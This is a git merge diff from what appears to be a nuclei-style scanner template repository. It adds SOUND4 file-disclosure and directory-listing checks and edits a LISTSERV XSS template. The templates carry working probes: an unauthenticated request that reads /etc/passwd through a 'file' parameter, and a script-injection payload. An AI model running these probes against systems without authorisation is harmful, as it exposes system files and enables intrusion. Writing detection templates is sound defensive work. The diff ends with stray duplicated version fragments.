Merge branch 'main' into uvicorn-detect

2023-01-23 14:09:36 +05:30 · 2023-01-23 14:09:36 +05:30 · e12559a70d
parent 8289c73239 842ab6f258
commit e12559a70d
8 changed files with 82 additions and 7 deletions
--- a/.github/auto_assign.yml
+++ b/.github/auto_assign.yml
@ -9,7 +9,6 @@ reviewers:
  - ritikchaddha
  - DhiyaneshGeek
  - pussycat0x
-  - princechaddha

 # A number of reviewers added to the pull request
 # Set 0 to add all the reviewers (default: 0)
@ -17,9 +16,9 @@ numberOfReviewers: 1

 # A list of assignees, overrides reviewers if set
 assignees:
-  - ritikchaddha
  - DhiyaneshGeek
  - pussycat0x
+  - ritikchaddha

 # A number of assignees to add to the pull request
 # Set to 0 to add all of the assignees.
--- a/.new-additions
+++ b/.new-additions
@ -1 +1,3 @@
 cves/2022/CVE-2022-1168.yaml
+vulnerabilities/other/sound4-file-disclosure.yaml
+"\342\200\216\342\200\216misconfiguration/sound4-directory-listing.yaml"
--- a/cves/2019/CVE-2019-15501.yaml
+++ b/cves/2019/CVE-2019-15501.yaml
@ -2,9 +2,10 @@ id: CVE-2019-15501

 info:
  name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
-  author: LogicalHunter
+  author: LogicalHunter,arafatansari
  severity: medium
-  description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
+  description: |
+    L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
  reference:
    - https://www.exploit-db.com/exploits/47302
    - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
@ -14,6 +15,9 @@ info:
    cvss-score: 6.1
    cve-id: CVE-2019-15501
    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"LISTSERV"
+    verified: "true"
  tags: cve,cve2019,xss,listserv,edb

 requests:
@ -24,9 +28,12 @@ requests:
    matchers-condition: and
    matchers:
      - type: word
+        part: body
        words:
          - '</script><script>alert(document.domain)</script>'
-        part: body
+          - 'LISTSERV'
+        condition: and
+        case-insensitive: true

      - type: word
        part: header
--- a/helpers/wordpress/plugins/redirection.txt
+++ b/helpers/wordpress/plugins/redirection.txt
@ -1 +1 @@
-5.3.6
+5.3.8
--- a/helpers/wordpress/plugins/wp-user-avatar.txt
+++ b/helpers/wordpress/plugins/wp-user-avatar.txt
@ -1 +1 @@
-4.5.4
+4.5.5
--- a/technologies/tech-detect.yaml
+++ b/technologies/tech-detect.yaml
@ -3681,3 +3681,8 @@ requests:
        part: header
        words:
          - "uvicorn"
+
+        name: tornado
+        part: header
+        words:
+          - "TornadoServer/"
--- a/vulnerabilities/other/sound4-file-disclosure.yaml
+++ b/vulnerabilities/other/sound4-file-disclosure.yaml
@ -0,0 +1,30 @@
+id: sound4-file-disclosure
+
+info:
+  name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
+  author: arafatansari
+  severity: medium
+  description: |
+    The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
+  reference:
+    - https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
+  metadata:
+    shodan-query: http.html:"SOUND4"
+    verified: "true"
+  tags: packetstorm,lfi,sound4,unauth,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
--- a/‎‎misconfiguration/sound4-directory-listing.yaml
+++ b/‎‎misconfiguration/sound4-directory-listing.yaml
@ -0,0 +1,32 @@
+id: sound4-directory-listing
+
+info:
+  name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure
+  author: arafatansari
+  severity: medium
+  description: |
+    The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information.
+  reference:
+    - https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php
+  metadata:
+    verified: true
+    shodan-query: http.html:"SOUND4"
+  tags: misconfig,listing,sound4,disclosure,packetstorm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/log/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>Index of /log</title>"
+          - "Parent Directory"
+        condition: and
+
+      - type: status
+        status:
+          - 200
 @ -1 +1 @@
 .3.6
 .3.8
 @ -1 +1 @@
 .5.4
 .5.5